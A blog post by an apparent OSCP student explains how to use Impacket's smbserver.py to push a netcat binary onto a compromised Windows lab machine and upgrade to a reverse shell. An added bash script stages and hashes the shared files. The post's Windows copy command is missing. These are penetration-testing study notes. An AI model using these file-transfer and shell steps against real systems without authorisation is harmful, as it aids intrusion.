My buddy Julian and I are both on the road to OSCP. We've been setting up study sessions where we attack boxes from TJ Null's list of OSCP-like boxes. It's a live list that's always growing. Worth checking out if you're studying for the exam.
Anyway, I've been avoiding Windows systems for a while, because I... well, the truth is, I hate dealing with them. They never have all the cool stuff I need like Netcat, curl or wget, which makes it a real pain when it comes to transferring files or quickly setting up reverse shells.
I'll admit it's a bit n00bish for me to just now be aware of this, but as I say, I've avoided Windows boxes for too long, and had to be pushed to start working on them. (Still hate them, though.)
All that said, I've finally learned a pretty solid way to transfer files to my victim machine when I have a basic derpy shell.
Say hello to Impacket's smbserver.py. It's a Python script that launches an SMB server, which I can then pull a file from with the copy command on Windows. In most cases that file is a Netcat binary, which I then use to catch a more solid shell on my attack machine.
First, install Impacket
Clone the GitHub repo:
git clone https://github.com/SecureAuthCorp/impacket.git
Once that sucker is cloned, cd into the impacket directory and run
pip install .
Set up the share and copy the file
From my Kali machine, I run the following command:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support mewmeow /tmp
This runs Impacket's smbserver.py under python3, using the full path to the script. Breaking the arguments down:
-smb2support enables SMB2. Without it, some newer Windows machines will throw an error when you attempt to copy the file.
mewmeow names the share "mewmeow".
/tmp is the directory on my Kali machine to share. In this case I shared /tmp and dropped a Windows Netcat binary (nc.exe) in there.
From the victim machine, I run the following:
This tells the Windows box to copy from the SMB share I just set up: it looks for the mewmeow share on my Kali machine and copies nc.exe into my current directory on Windows.
Easy peasy. So far, it's been one of the more consistently reliable ways to pull this off.
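One thing worth tightening up in the setup above: with no -username/-password, smbserver.py serves the share to anything that can reach port 445 on the Kali box, so sharing all of /tmp exposes whatever else happens to be sitting there. The script below is an added example (not code from the original post or from Impacket) that stages only the files you mean to serve into a fresh directory, writes a SHA-256 manifest so the copy on the Windows side can be checked, and builds the smbserver.py command line, optionally with credentials. It assumes smbserver.py lives at the Kali path used in the post (override with SMBSERVER=...) and that -username and -password are accepted by smbserver.py; the share name, the SHARE_USER/SHARE_PASS variables and the dummy payload in the usage are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post or from Impacket.
# Stages only the files to serve into a fresh directory, records their
# SHA-256 sums, and starts smbserver.py on that directory.
# Assumptions: smbserver.py is at the Kali path from the post (override
# with SMBSERVER=...); -username/-password are smbserver.py options;
# SHARE_USER/SHARE_PASS and the share name are constructed for this example.
set -euo pipefail

SMBSERVER="${SMBSERVER:-/usr/share/doc/python3-impacket/examples/smbserver.py}"

# stage_share <share_dir> <file>...
# Backs the share with a dedicated, initially empty directory so an
# anonymous share exposes nothing beyond the listed files. Writes a
# SHA256SUMS manifest next to them and prints the directory path.
stage_share() {
  local dir="$1"; shift
  [ "$#" -ge 1 ] || { echo "stage_share: no files given" >&2; return 1; }
  rm -rf -- "$dir"
  mkdir -p -- "$dir"
  chmod 755 "$dir"
  local f
  for f in "$@"; do
    [ -f "$f" ] || { echo "stage_share: not a file: $f" >&2; return 1; }
    cp -- "$f" "$dir/"
  done
  # The redirect creates SHA256SUMS before the glob runs, so skip it.
  ( cd "$dir" && for f in *; do [ "$f" = SHA256SUMS ] || sha256sum -- "$f"; done > SHA256SUMS )
  printf '%s\n' "$dir"
}

# verify_manifest <share_dir>
# Re-checks the staged files against SHA256SUMS; non-zero if any changed.
# Copy SHA256SUMS over with the payload and compare on the Windows side
# (certutil -hashfile <file> SHA256).
verify_manifest() {
  ( cd "$1" && sha256sum -c --quiet SHA256SUMS )
}

# server_cmd <share_name> <share_dir> [user] [password]
# Prints the command that starts the server: sudo because port 445 needs
# root, -smb2support as in the post. With a user/password the share is no
# longer anonymous and Windows must first run
#   net use \\<KALI_IP>\<share_name> /user:<user> <password>
server_cmd() {
  local name="$1" dir="$2" user="${3:-}" pass="${4:-}"
  local cmd="sudo python3 $SMBSERVER -smb2support"
  if [ -n "$user" ]; then
    cmd="$cmd -username $user -password $pass"
  fi
  printf '%s %s %s\n' "$cmd" "$name" "$dir"
}

# Usage: SHARE_USER=tester SHARE_PASS=s3cret ./smbshare.sh serve mewmeow /path/to/nc.exe
# Then on Windows: copy \\<KALI_IP>\mewmeow\nc.exe .
if [ "${1:-}" = "serve" ]; then
  shift
  name="$1"; shift
  dir="$(stage_share "$(mktemp -d /tmp/share.XXXXXX)" "$@")"
  verify_manifest "$dir"
  echo "+ $(server_cmd "$name" "$dir" "${SHARE_USER:-}" "${SHARE_PASS:-}")"
  args=(-smb2support)
  if [ -n "${SHARE_USER:-}" ]; then
    args+=(-username "$SHARE_USER" -password "${SHARE_PASS:-}")
  fi
  exec sudo python3 "$SMBSERVER" "${args[@]}" "$name" "$dir"
fi
```

The serve branch execs the real command from an argument array rather than eval'ing the printed string, so a share name or path with odd characters can't be reinterpreted by the shell; the printed line is just there so you can see exactly what was launched.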